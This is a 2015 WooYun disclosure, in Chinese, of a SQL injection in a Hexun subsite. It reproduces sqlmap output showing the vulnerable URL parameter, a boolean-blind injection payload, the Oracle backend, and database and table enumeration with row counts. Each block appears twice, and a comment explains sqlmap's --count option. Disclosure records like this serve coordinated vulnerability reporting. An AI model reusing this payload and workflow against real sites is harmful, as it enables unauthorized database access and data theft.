和讯网某分站SQL注射漏洞之和讯网某分站（明文账号密码）

发表于 2015年07月09日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0125699

漏洞标题：和讯网某分站SQL注射漏洞之和讯网某分站（明文账号密码）

漏洞详情

披露状态：

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认，细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述：

请叫我安全小飞侠，谢谢！

详细说明：

http://baidu.hexun.com/report/ifread.php?t=1&id=617695注射参数: idURI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an<br>
y)? [y/N] N<br>
sqlmap identified the following injection points with a total of 81 HTTP(s) requ<br>
ests:<br>
---<br>
Parameter: #1* (URI)<br>
    Type: boolean-based blind<br>
    Title: AND boolean-based blind - WHERE or HAVING clause<br>
    Payload: http://baidu.hexun.com:80/report/ifread.php?t=1&id=617695 AND 7598=<br>
7598<br>
---<br>
[16:04:00] [INFO] testing MySQL<br>
[16:04:01] [WARNING] the back-end DBMS is not MySQL<br>
[16:04:01] [INFO] testing Oracle<br>
[16:04:01] [INFO] confirming Oracle<br>
[16:04:02] [INFO] the back-end DBMS is Oracle<br>
back-end DBMS: Oracleavailable databases [9]:<br>
[*] BDFIN<br>
[*] CTXSYS<br>
[*] EXFSYS<br>
[*] MDSYS<br>
[*] OLAPSYS<br>
[*] REPDBO<br>
[*] SYS<br>
[*] SYSTEM<br>
[*] WMSYS

http://baidu.hexun.com/report/ifread.php?t=1&id=617695注射参数: idURI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an

y)? [y/N] N

sqlmap identified the following injection points with a total of 81 HTTP(s) requ

ests:

---

Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://baidu.hexun.com:80/report/ifread.php?t=1&id=617695 AND 7598=

7598

---

[16:04:00] [INFO] testing MySQL

[16:04:01] [WARNING] the back-end DBMS is not MySQL

[16:04:01] [INFO] testing Oracle

[16:04:01] [INFO] confirming Oracle

[16:04:02] [INFO] the back-end DBMS is Oracle

back-end DBMS: Oracleavailable databases [9]:

[*] BDFIN

[*] CTXSYS

[*] EXFSYS

[*] MDSYS

[*] OLAPSYS

[*] REPDBO

[*] SYS

[*] SYSTEM

[*] WMSYS

+------------------------+---------+<br>
| Table                  | Entries |<br>
+------------------------+---------+<br>
| FUTURES_QUOTE          | 26984041 |<br>
| R_STOCKS_SECTOR        | 3604361 |<br>
| TB_HJ_TTJ              | 2477437 |<br>
| TB_STOCK_BOARD         | 2215113 |<br>
| VOTE                   | 2186237 |<br>
| TB_SGE_QUOTE           | 1463523 |<br>
| TB_METAL_QUOTE         | 1438797 |<br>
| USA_STOCK_QUOTE_TMP    | 1067821 |<br>
| R_INFO_O               | 1029189 |<br>
| TB_STOCK_BOARD_INDEX   | 865135  |<br>
| R_INFO                 | 597134  |<br>
| TB_TJS_FS              | 525422  |<br>
| TB_METAL_QUOTE_FX678   | 497540  |<br>
| CS_TNCONT              | 152035  |<br>
| TB_STOCK_BOARD_MONITOR | 64100   |<br>
| USA_STOCK_QUOTE        | 48146   |<br>
| TB_SW_HQ               | 25045   |<br>
| CODE_INFO              | 22329   |<br>
| STOCK_BOARD            | 4311    |<br>
| STOCK_BOARD_MONITOR    | 4295    |<br>
| R_STOCK                | 4225    |<br>
| R_INFO_2               | 3970    |<br>
| TB_TJS_K               | 2012    |<br>
| R_SECTOR_TDX           | 1986    |<br>
| VOTE_MI                | 925     |<br>
| R_GRADE                | 645     |<br>
| USA_STOCK_CODE         | 442     |<br>
| R_INDUSTRY             | 345     |<br>
| CT_USERINFO            | 289     |<br>
| TRADINFO               | 270     |<br>
| CS_TNCONT_NEW          | 209     |<br>
| R_INSCODE              | 146     |<br>
| R_SECTOR               | 134     |<br>
| CS_TNCONF              | 123     |<br>
| MEMBER_STOCKS          | 43      |<br>
| FUTURES_CODE           | 27      |<br>
| AD_KB                  | 26      |<br>
| TEST                   | 25      |<br>
| MEMBER_STOCK_TRADE     | 13      |<br>
| MEMBER_STOCK_GROUPS    | 11      |<br>
| RP_TEST                | 9       |<br>
| ACCOUNT                | 6       |<br>
| REPORT_USER_ACCOUNT    | 5       |<br>
+------------------------+---------+

+------------------------+---------+

| Table | Entries |

+------------------------+---------+

| FUTURES_QUOTE | 26984041 |

| R_STOCKS_SECTOR | 3604361 |

| TB_HJ_TTJ | 2477437 |

| TB_STOCK_BOARD | 2215113 |

| VOTE | 2186237 |

| TB_SGE_QUOTE | 1463523 |

| TB_METAL_QUOTE | 1438797 |

| USA_STOCK_QUOTE_TMP | 1067821 |

| R_INFO_O | 1029189 |

| TB_STOCK_BOARD_INDEX | 865135 |

| R_INFO | 597134 |

| TB_TJS_FS | 525422 |

| TB_METAL_QUOTE_FX678 | 497540 |

| CS_TNCONT | 152035 |

| TB_STOCK_BOARD_MONITOR | 64100 |

| USA_STOCK_QUOTE | 48146 |

| TB_SW_HQ | 25045 |

| CODE_INFO | 22329 |

| STOCK_BOARD | 4311 |

| STOCK_BOARD_MONITOR | 4295 |

| R_STOCK | 4225 |

| R_INFO_2 | 3970 |

| TB_TJS_K | 2012 |

| R_SECTOR_TDX | 1986 |

| VOTE_MI | 925 |

| R_GRADE | 645 |

| USA_STOCK_CODE | 442 |

| R_INDUSTRY | 345 |

| CT_USERINFO | 289 |

| TRADINFO | 270 |

| CS_TNCONT_NEW | 209 |

| R_INSCODE | 146 |

| R_SECTOR | 134 |

| CS_TNCONF | 123 |

| MEMBER_STOCKS | 43 |

| FUTURES_CODE | 27 |

| AD_KB | 26 |

| TEST | 25 |

| MEMBER_STOCK_TRADE | 13 |

| MEMBER_STOCK_GROUPS | 11 |

| RP_TEST | 9 |

| ACCOUNT | 6 |

| REPORT_USER_ACCOUNT | 5 |

+------------------------+---------+

漏洞证明：

http://baidu.hexun.com/report/ifread.php?t=1&id=617695注射参数: idURI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an<br>
y)? [y/N] N<br>
sqlmap identified the following injection points with a total of 81 HTTP(s) requ<br>
ests:<br>
---<br>
Parameter: #1* (URI)<br>
    Type: boolean-based blind<br>
    Title: AND boolean-based blind - WHERE or HAVING clause<br>
    Payload: http://baidu.hexun.com:80/report/ifread.php?t=1&id=617695 AND 7598=<br>
7598<br>
---<br>
[16:04:00] [INFO] testing MySQL<br>
[16:04:01] [WARNING] the back-end DBMS is not MySQL<br>
[16:04:01] [INFO] testing Oracle<br>
[16:04:01] [INFO] confirming Oracle<br>
[16:04:02] [INFO] the back-end DBMS is Oracle<br>
back-end DBMS: Oracleavailable databases [9]:<br>
[*] BDFIN<br>
[*] CTXSYS<br>
[*] EXFSYS<br>
[*] MDSYS<br>
[*] OLAPSYS<br>
[*] REPDBO<br>
[*] SYS<br>
[*] SYSTEM<br>
[*] WMSYS

http://baidu.hexun.com/report/ifread.php?t=1&id=617695注射参数: idURI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an

y)? [y/N] N

sqlmap identified the following injection points with a total of 81 HTTP(s) requ

ests:

---

Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://baidu.hexun.com:80/report/ifread.php?t=1&id=617695 AND 7598=

7598

---

[16:04:00] [INFO] testing MySQL

[16:04:01] [WARNING] the back-end DBMS is not MySQL

[16:04:01] [INFO] testing Oracle

[16:04:01] [INFO] confirming Oracle

[16:04:02] [INFO] the back-end DBMS is Oracle

back-end DBMS: Oracleavailable databases [9]:

[*] BDFIN

[*] CTXSYS

[*] EXFSYS

[*] MDSYS

[*] OLAPSYS

[*] REPDBO

[*] SYS

[*] SYSTEM

[*] WMSYS

+------------------------+---------+<br>
| Table                  | Entries |<br>
+------------------------+---------+<br>
| FUTURES_QUOTE          | 26984041 |<br>
| R_STOCKS_SECTOR        | 3604361 |<br>
| TB_HJ_TTJ              | 2477437 |<br>
| TB_STOCK_BOARD         | 2215113 |<br>
| VOTE                   | 2186237 |<br>
| TB_SGE_QUOTE           | 1463523 |<br>
| TB_METAL_QUOTE         | 1438797 |<br>
| USA_STOCK_QUOTE_TMP    | 1067821 |<br>
| R_INFO_O               | 1029189 |<br>
| TB_STOCK_BOARD_INDEX   | 865135  |<br>
| R_INFO                 | 597134  |<br>
| TB_TJS_FS              | 525422  |<br>
| TB_METAL_QUOTE_FX678   | 497540  |<br>
| CS_TNCONT              | 152035  |<br>
| TB_STOCK_BOARD_MONITOR | 64100   |<br>
| USA_STOCK_QUOTE        | 48146   |<br>
| TB_SW_HQ               | 25045   |<br>
| CODE_INFO              | 22329   |<br>
| STOCK_BOARD            | 4311    |<br>
| STOCK_BOARD_MONITOR    | 4295    |<br>
| R_STOCK                | 4225    |<br>
| R_INFO_2               | 3970    |<br>
| TB_TJS_K               | 2012    |<br>
| R_SECTOR_TDX           | 1986    |<br>
| VOTE_MI                | 925     |<br>
| R_GRADE                | 645     |<br>
| USA_STOCK_CODE         | 442     |<br>
| R_INDUSTRY             | 345     |<br>
| CT_USERINFO            | 289     |<br>
| TRADINFO               | 270     |<br>
| CS_TNCONT_NEW          | 209     |<br>
| R_INSCODE              | 146     |<br>
| R_SECTOR               | 134     |<br>
| CS_TNCONF              | 123     |<br>
| MEMBER_STOCKS          | 43      |<br>
| FUTURES_CODE           | 27      |<br>
| AD_KB                  | 26      |<br>
| TEST                   | 25      |<br>
| MEMBER_STOCK_TRADE     | 13      |<br>
| MEMBER_STOCK_GROUPS    | 11      |<br>
| RP_TEST                | 9       |<br>
| ACCOUNT                | 6       |<br>
| REPORT_USER_ACCOUNT    | 5       |<br>
+------------------------+---------+

+------------------------+---------+

| Table | Entries |

+------------------------+---------+

| FUTURES_QUOTE | 26984041 |

| R_STOCKS_SECTOR | 3604361 |

| TB_HJ_TTJ | 2477437 |

| TB_STOCK_BOARD | 2215113 |

| VOTE | 2186237 |

| TB_SGE_QUOTE | 1463523 |

| TB_METAL_QUOTE | 1438797 |

| USA_STOCK_QUOTE_TMP | 1067821 |

| R_INFO_O | 1029189 |

| TB_STOCK_BOARD_INDEX | 865135 |

| R_INFO | 597134 |

| TB_TJS_FS | 525422 |

| TB_METAL_QUOTE_FX678 | 497540 |

| CS_TNCONT | 152035 |

| TB_STOCK_BOARD_MONITOR | 64100 |

| USA_STOCK_QUOTE | 48146 |

| TB_SW_HQ | 25045 |

| CODE_INFO | 22329 |

| STOCK_BOARD | 4311 |

| STOCK_BOARD_MONITOR | 4295 |

| R_STOCK | 4225 |

| R_INFO_2 | 3970 |

| TB_TJS_K | 2012 |

| R_SECTOR_TDX | 1986 |

| VOTE_MI | 925 |

| R_GRADE | 645 |

| USA_STOCK_CODE | 442 |

| R_INDUSTRY | 345 |

| CT_USERINFO | 289 |

| TRADINFO | 270 |

| CS_TNCONT_NEW | 209 |

| R_INSCODE | 146 |

| R_SECTOR | 134 |

| CS_TNCONF | 123 |

| MEMBER_STOCKS | 43 |

| FUTURES_CODE | 27 |

| AD_KB | 26 |

| TEST | 25 |

| MEMBER_STOCK_TRADE | 13 |

| MEMBER_STOCK_GROUPS | 11 |

| RP_TEST | 9 |

| ACCOUNT | 6 |

| REPORT_USER_ACCOUNT | 5 |

+------------------------+---------+

修复方案：

你懂的，抓紧修复吧

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-07-0917:33

厂商回复：

谢谢

评价

2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)

@安全小飞侠 Table | Entries | entries 这个参数怎么显示？？
2010-01-01 00:00 安全小飞侠白帽子 | Rank:66 漏洞数:6)

@DloveJ --count 参数
2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)

@安全小飞侠嗯嗯，，谢谢，ok